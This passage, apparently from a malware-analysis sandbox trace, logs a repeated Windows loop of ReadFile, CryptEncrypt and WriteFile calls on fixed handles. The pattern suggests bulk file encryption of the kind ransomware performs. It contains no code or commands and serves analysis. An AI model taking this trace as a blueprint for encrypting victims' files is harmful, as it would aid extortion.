lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.806] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.806] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.806] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.806] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.806] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.806] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.807] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.807] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.807] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.807] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.807] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.807] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.807] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.807] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.808] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.808] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.808] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.808] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.808] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.808] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.808] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.808] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.808] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.808] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.808] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.808] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.808] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.809] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.809] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.809] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.809] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.809] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.809] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.809] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.809] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.809] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.810] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.810] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.810] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.810] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.810] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.810] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.810] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.810] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.810] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.811] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.811] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.811] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.811] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.811] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.811] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.811] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.811] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.811] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.811] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.811] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.811] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.812] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.812] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.812] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.812] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.812] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.812] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.812] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.812] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.812] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.813] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.813] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.813] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.813] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.813] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.813] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.813] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.813] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.813] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.813] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.813] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.813] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.813] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.813] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.814] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.814] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.814] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.814] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.814] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.814] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.814] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.814] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.814] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.815] CryptEncrypt (in: 